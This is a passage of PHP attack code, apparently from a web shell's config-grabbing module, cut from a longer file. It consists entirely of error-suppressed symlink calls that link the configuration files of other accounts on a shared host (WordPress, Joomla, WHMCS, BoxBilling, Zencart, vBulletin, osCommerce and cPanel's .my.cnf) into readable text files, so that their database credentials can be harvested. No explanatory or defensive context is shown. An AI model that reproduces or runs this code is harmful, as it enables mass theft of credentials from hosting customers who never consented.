                                                                    @symlink('/home6/' . $user . '/public_html/test/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/demo/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/home/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/v1/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/v2/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/press/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/new/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/blogs/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/blog/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/submitticket.php', $user . '-^WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/cms/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/beta/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/portal/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/site/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/main/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/home/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/demo/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/test/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/v1/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/v2/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/joomla/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/new/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/WHMCS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/whmcs1/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/Whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/WHMC/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/Whmc/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/whmc/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/WHM/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/Whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/HOST/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/Host/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/host/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/SUPPORTES/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/Supportes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/supportes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/domains/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/domain/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/Hosting/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/HOSTING/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/hosting/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/CART/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/Cart/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/cart/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/ORDER/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/Order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/CLIENT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/Client/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/client/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/CLIENTAREA/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/Clientarea/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/clientarea/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/SUPPORT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/Support/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/support/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/BILLING/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/Billing/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/billing/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/BUY/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/Buy/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/buy/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/MANAGE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/Manage/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/manage/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/CLIENTSUPPORT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/ClientSupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/Clientsupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/clientsupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/CHECKOUT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/Checkout/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/checkout/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/BILLINGS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/Billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/BASKET/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/Basket/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/basket/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/SECURE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/Secure/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/secure/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/SALES/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/Sales/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/sales/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/BILL/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/Bill/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/bill/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/PURCHASE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/Purchase/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/purchase/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/ACCOUNT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/Account/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/account/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/USER/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/User/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/user/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/CLIENTS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/Clients/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/clients/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/BILLINGS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/Billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/MY/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/My/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/my/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/secure/whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/panel/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/clientes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/cliente/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/support/order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/boxbilling/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/box/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/host/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/Host/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/supportes/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/support/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/hosting/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/cart/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/order/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/client/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/clients/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/cliente/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/clientes/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/billing/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/billings/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/my/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/secure/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/support/order/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/products/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/cart/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/host/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/Host/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/supportes/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/support/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/cart/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/order/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/client/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/clients/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/cliente/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/clientes/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/my/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/secure/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/support/order/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home6/' . $user . '/.my.cnf', $user . '-Cpanel.txt');
                                                                    @symlink('/home6/' . $user . '/public_html/po-content/config.php', $user . '-Popoji.txt');
                                                                    //home 7
                                                                    @symlink('/home7/' . $user . '/public_html/vb/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/forum/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/forums/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/cc/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/inc/config.php', $user . '-MyBB.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/shop/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/os/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/oscom/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/products/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/cart/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/inc/conf_global.php', $user . '-IPB.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/wp/test/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/blog/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/beta/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/portal/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/site/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/wp/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/WP/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/news/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/wordpress/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/test/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/demo/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/home/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/v1/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/v2/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/press/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/new/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/blogs/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/blog/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/submitticket.php', $user . '-^WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/cms/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/beta/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/portal/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/site/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/main/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/home/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/demo/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/test/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/v1/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/v2/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/joomla/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/new/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/WHMCS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/whmcs1/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/Whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/WHMC/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/Whmc/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/whmc/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/WHM/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/Whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/HOST/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/Host/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/host/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/SUPPORTES/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/Supportes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/supportes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/domains/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/domain/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/Hosting/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/HOSTING/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/hosting/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/CART/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/Cart/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/cart/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/ORDER/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/Order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/CLIENT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/Client/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/client/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/CLIENTAREA/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/Clientarea/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/clientarea/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/SUPPORT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/Support/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/support/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/BILLING/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/Billing/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/billing/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/BUY/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/Buy/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/buy/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/MANAGE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/Manage/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/manage/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/CLIENTSUPPORT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/ClientSupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/Clientsupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/clientsupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/CHECKOUT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/Checkout/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/checkout/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/BILLINGS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/Billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/BASKET/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/Basket/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/basket/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/SECURE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/Secure/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/secure/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/SALES/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/Sales/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/sales/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/BILL/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/Bill/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/bill/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/PURCHASE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/Purchase/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/purchase/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/ACCOUNT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/Account/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/account/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/USER/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/User/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/user/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/CLIENTS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/Clients/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/clients/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/BILLINGS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/Billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/MY/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/My/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/my/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/secure/whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/panel/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/clientes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/cliente/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/support/order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/bb-config.php', $user . '-BoxBilling.txt');
